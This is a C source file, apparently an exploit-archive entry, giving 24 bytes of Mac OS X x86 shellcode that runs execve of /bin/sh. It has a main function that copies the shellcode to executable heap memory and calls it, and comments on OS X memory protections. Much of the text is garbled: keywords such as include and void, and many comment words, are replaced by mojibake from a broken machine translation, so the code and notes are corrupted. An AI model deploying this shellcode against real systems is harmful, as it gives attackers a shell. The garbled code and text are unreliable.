/*
¸ª½ñ¤òÍ¿¤¨¤ë : OSX/x86 intel - execve(/Ãù¢½ê/sh) - 24 bytes
Type : Shellcode
Author : Simon Derouineau - simon.derouineau [AT] ingesup.com
ÃÅ¡¦¹ËÎΡ¦¸øÌó : Mac OSX/Intel. ¼Â¸³¡Ê¤¹¤ë¡Ëd on 10.6.4 Build 10F569

¡Ê·Ù»¡¤Ê¤É¤Ø¤Î¡ËÌ©¹ð¡¤¹ðÁʡʾõ¡Ës : This code has to be ¼ý½¸¤¹¤ëd with gcc -m32 switch  on 10.6.0+

More ¡Ê·Ù»¡¤Ê¤É¤Ø¤Î¡ËÌ©¹ð¡¤¹ðÁʡʾõ¡Ës : x86-64 code is more °ÂÁ´¤Ê¡¦Êݾڤ¹¤ëd than x86 code on OSX ÃÅ¡¦¹ËÎΡ¦¸øÌó : 
Canaries are Äɲ乤ëd, Stack and heap are Èó¡¤ÉÔ¡¤Ìµ-executable, etc.

Also, cat /var/db/dyld/dyld_shared_cache_x86_64.ÃÏ¿Þ¡¿·×²è¤¹¤ë shows that no memory can be 
mapped with WX ´ús, while it's possible with x86 code ( ¤Ë¤è¤ì¤Ð  /var/db/dyld/dyld_shared_cache_i386.ÃÏ¿Þ¡¿·×²è¤¹¤ë).

The method used here is the easier one, heap is executable in x86 »ÈÍÑ¡¿Å¬ÍÑs, 
as ½Ò¤Ù¤ëd in "The Mac Hacker's Handbook", written by Charlie Miller.

The trick is to memcopy the shellcode to the heap before ¿ë¹Ô¤¹¤ë¡¿È¯¸ú¤µ¤»¤ëing it.

*/


#´Þ¤à <stdio.h> 
#´Þ¤à <stdlib.h> 
#´Þ¤à <string.h>



char shellcode[]= 	"\x31\xC0" 			// xor eax,eax
			"\x50"				// ²¡¤·¿Ê¤á¤ë eax
			"\x68\x2F\x2F\x73\x68"		// ²¡¤·¿Ê¤á¤ë dword
			"\x68\x2F\x62\x69\x6E"		// ²¡¤·¿Ê¤á¤ë dword 
			"\x89\xE3"			// mov ebx,esp
			"\x50\x50\x53"			// ²¡¤·¿Ê¤á¤ë eax, ²¡¤·¿Ê¤á¤ë eax, ²¡¤·¿Ê¤á¤ë ebx
			"\xB0\x3B"			// mov al,0x3b
			"\x6A\x2A"			// ²¡¤·¿Ê¤á¤ë byte 0x2a
			"\xCD\x80"			// int 0x80


int main(int argc, char *argv[]){
̵¸ú¤Î (*f)(); 
char *x = malloc(sizeof(shellcode));
memcpy(x, shellcode, sizeof(shellcode));
f = (̵¸ú¤Î (*)()) x;
f();
}